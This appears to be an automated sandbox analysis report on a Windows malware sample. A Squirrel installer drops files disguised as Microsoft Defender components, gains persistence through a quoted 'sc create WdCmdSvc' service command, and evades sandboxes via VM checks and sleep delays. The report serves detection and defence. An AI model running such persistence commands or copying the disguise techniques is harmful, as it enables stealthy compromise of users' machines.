          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpDetours.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpSvc.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\Update.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\shellext.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dllJump to dropped file
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpRes.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\ContentPack\BumpFiles.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpOAV.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpProvider.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCommu.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\MpClient.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeFile created: C:\Program Files (x86)\Microsoft.NET\NisSrv.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft CorporationJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft Corporation\Microsoft Malware Protection.lnkJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_005E0E10 IsIconic,4_2_005E0E10
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 4_2_005E0E94 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,4_2_005E0E94
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_005E0E10 IsIconic,7_2_005E0E10
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCode function: 7_2_005E0E94 GetWindowLongW,IsIconic,IsWindowVisible,ShowWindow,SetWindowLongW,SetWindowLongW,ShowWindow,ShowWindow,7_2_005E0E94
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeCheck user administrative privileges: IsUserAndAdmin, DecisionNodegraph_4-11025
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: 1360000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeMemory allocated: 1B140000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1108Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeWindow / User API: threadDelayed 1954Jump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\vcruntime140.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpRtp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\EppManifest.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.muiJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpRes.dllJump to dropped file
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.mui
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpOAV.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.mui
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.mui
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetours.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.mui
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpProvider.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCommu.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.mui
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.mui
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpClient.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.mui
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\shellext.dll
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\NisSrv.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Check user administrative privileges: GetTokenInformation,DecisionNodes graph_0-12510
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 5892 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 2556 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_00235564 FindFirstFileExW,0_2_00235564
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040D3E4 FindFirstFileW,FindClose,4_2_0040D3E4
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,4_2_0040CE18
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 7_2_0040D3E4 FindFirstFileW,FindClose,7_2_0040D3E4
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 7_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,7_2_0040CE18
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_00229ED6 VirtualQuery,GetSystemInfo,0_2_00229ED6
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Thread delayed: delay time: 922337203685477
          Source: BumpFiles.exe, 00000007.00000002.3857430328.00000000033D3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX
          Source: DefenderCSP.dll.7.dr Binary or memory string: 3(%lsMicrosoft HvVMwareVMware
          Source: DefenderCSP.dll.7.dr Binary or memory string: DefenderDetectionsNameURLSeverityCategoryCurrentStatusExecutionStatusInitialDetectionTimeLastThreatStatusChangeTimeNumberOfDetectionsHealthProductStatusComputerStateDefenderEnabledRtpEnabledNisEnabledQuickScanOverdueFullScanOverdueSignatureOutOfDateRebootRequiredFullScanRequiredEngineVersionSignatureVersionDefenderVersionQuickScanTimeFullScanTimeQuickScanSigVersionFullScanSigVersionTamperProtectionEnabledIsVirtualMachineConfigurationDeviceControlPolicyGroupsGroupDataPolicyRulesRuleDataTamperProtectionEnableFileHashComputationMeteredConnectionUpdatesSupportLogLocationExcludedIpAddressesAllowNetworkProtectionOnWinServerDisableCpuThrottleOnIdleScansDisableLocalAdminMergeSchedulerRandomizationTimeDisableTlsParsingDisableHttpParsingDisableDnsParsingDisableDnsOverTcpParsingDisableSshParsingPlatformUpdatesChannelEngineUpdatesChannelSecurityIntelligenceUpdatesChannelDisableGradualReleaseAllowNetworkProtectionDownLevelEnableDnsSinkholeDisableInboundConnectionFilteringDisableRdpParsingAllowDatagramProcessingOnWinServerDisableNetworkProtectionPerfTelemetryHideExclusionsFromLocalAdminsThrottleForScheduledScanOnlyASROnlyPerRuleExclusionsDataDuplicationDirectoryDataDuplicationRemoteLocationDisableFtpParsingDeviceControlEnabledDefaultEnforcementAllowSwitchToAsyncInspectionScanUpdateSignatureOfflineScanRollbackPlatformRollbackEngineNULL
          Source: ProtectionManagement.dll.7.dr Binary or memory string: Microsoft HvVMwareVMware
          Source: BumpFiles.exe, 00000004.00000002.3857556517.0000000003312000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_
          Source: BumpFiles.exe, 00000007.00000002.3857430328.00000000033D3000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857430328.000000000344A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: BumpFiles.exe, 00000007.00000002.3857430328.000000000341B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: ProtectionManagement.dll.7.dr Binary or memory string: VMwareVMware
          Source: ProtectionManagement.mfl0.7.dr Binary or memory string: quina virtual") : Amended ToSubclass] boolean IsVirtualMachine;
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe API call chain: ExitProcess graph end node graph_4-10986
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe API call chain: ExitProcess graph end node graph_7-11570
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_0022A2FF IsDebuggerPresent,OutputDebugStringW,0_2_0022A2FF
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_00227326 SetDefaultDllDirectories,LoadLibraryW,GetProcAddress,CoInitialize,InitCommonControlsEx,GetModuleHandleW,GetModuleFileNameW,0_2_00227326
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_002352EB mov eax, dword ptr fs:[00000030h] 0_2_002352EB
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_00231584 mov eax, dword ptr fs:[00000030h] 0_2_00231584
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_00236580 GetProcessHeap,0_2_00236580
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_0022A3EF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0022A3EF
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_0022AE25 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0022AE25
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_0022DED4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0022DED4
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_0022AFBB SetUnhandledExceptionFilter,0_2_0022AFBB
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe File created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe File created: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_00633718 ShellExecuteExW,WaitForSingleObject,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,4_2_00633718
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Process created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_0022AC7E cpuid 0_2_0022AC7E
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW,4_2_0040D51C
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_0040C9BC
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: GetUserDefaultUILanguage,GetLocaleInfoW,7_2_0040D51C
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_0040C9BC
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_0022B06B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0022B06B
          Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe Code function: 4_2_0040F148 GetVersion,4_2_0040F148
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: BumpFiles.exe, BumpFiles.exe, 00000007.00000002.3857980024.0000000004EB1000.00000004.00001000.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.3857980024.0000000004DDA000.00000004.00001000.00020000.00000000.sdmp, fuge.zip1.7.dr Binary or memory string: MsMpEng.exe
          Source: C:\Users\user\Desktop\0219830219301290321012notas.exe Code function: 0_2_002212B1 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,0_2_002212B1
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 11 Disable or Modify Tools | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
